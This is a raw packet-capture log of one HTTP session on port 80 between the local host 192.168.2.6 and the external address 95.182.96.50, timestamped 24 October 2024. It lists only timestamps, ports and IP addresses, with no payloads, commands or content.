Oct 24, 2024 13:54:15.934859991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934859991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934895039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934906006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934928894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934937000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934964895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934973001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935003996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935008049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935040951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935041904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935085058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935091019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935139894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935144901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935179949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935185909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935214996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935225010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935249090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935259104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935286045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935291052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935324907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935448885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935480118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935497999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935522079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935560942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935606003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935633898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935668945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935679913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935705900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935705900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935739994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935746908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935779095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.935782909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935822964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.935983896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.936026096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.936037064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.936072111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.936081886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.936106920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.936111927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.936144114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.936156034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.936187983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.936196089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.936232090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.936240911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.936263084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.936275959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.936296940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.975126028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.975184917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.975219011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.975254059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.975259066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.975300074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.046096087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.046161890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.046169043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.046214104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.046216965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.046261072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.046272993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.046308994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.046323061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.046344042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.046364069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.046384096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.046396017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.046422005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.046432018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.046468973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049360991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049391985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049417973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049446106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049446106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049483061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049489975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049519062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049525023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049556017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049566984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049602985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049644947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049679995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049693108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049716949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049724102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049751997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049753904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049802065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049813032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049849987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049868107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049884081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049897909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049921989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.049926043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.049972057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050023079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050076008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050092936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050123930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050133944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050158978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050168037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050200939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050215960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050251007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050261974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050287962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050293922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050324917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050329924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050365925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050425053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050476074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050542116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050584078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050596952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050632000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050662994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050667048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050672054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050703049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050717115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050740957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050745010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050776958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050779104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050813913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050828934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050851107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.050858974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.050892115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051063061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051110029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051120043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051155090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051168919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051198959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051209927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051259041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051265955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051302910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051309109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051350117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051362991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051398039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051405907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051433086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051439047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051470041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051475048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051508904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051511049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051553965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051852942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051908016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051911116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051944971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051964998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.051980019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.051990032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.052017927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.052021027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.052054882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.052062035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.052097082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.052159071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.052192926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.052211046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.052232981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.090260029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.090334892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.090337038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.090374947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.090385914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.090411901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.090421915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.090451002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.090462923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.090497017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.161314964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.161372900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.161384106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.161405087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.161418915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.161442995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.161449909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.161479950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.161490917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.161514997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.161528111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.161550999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.161562920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.161588907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.161598921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.161628962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.164674044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.164732933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.164735079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.164767027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.164783955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.164815903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.164830923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.164884090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.164890051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.164921045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.164926052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.164957047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.164966106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.164992094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.164999008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165025949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165031910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165066957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165075064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165101051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165113926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165144920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165155888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165193081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165206909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165235043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165297985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165330887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165348053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165373087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165378094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165430069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165430069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165467024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165477991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165499926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165509939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165534973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165549994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165566921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165580034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165606976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165617943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165661097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165668964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165704012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165718079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165745020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165760994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165802956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165812016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165847063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165857077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165882111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165899038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165920019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.165921926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165977001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.165981054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166016102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166029930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166049957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166063070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166090012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166102886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166136026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166146994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166177988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166187048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166234970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166239977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166285038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166297913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166325092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166351080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166385889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166400909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166419983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166428089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166517019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166532040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166553020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166558027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166589975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166599035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166625023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166639090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166660070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166666031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166695118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166707993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166732073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166745901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166769981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166784048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166805029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166822910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166840076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166845083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166877031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166893005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166910887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166918993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166946888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166949987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.166982889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.166986942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.167017937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.167026997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.167066097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.205605984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.205661058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.205670118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.205718040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.205729008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.205764055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.205779076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.205800056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.205809116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.205837011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.205842018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.205869913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.205883026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.205904961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.205912113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.206022978 CEST	49714	80	192.168.2.6	95.182.96.50
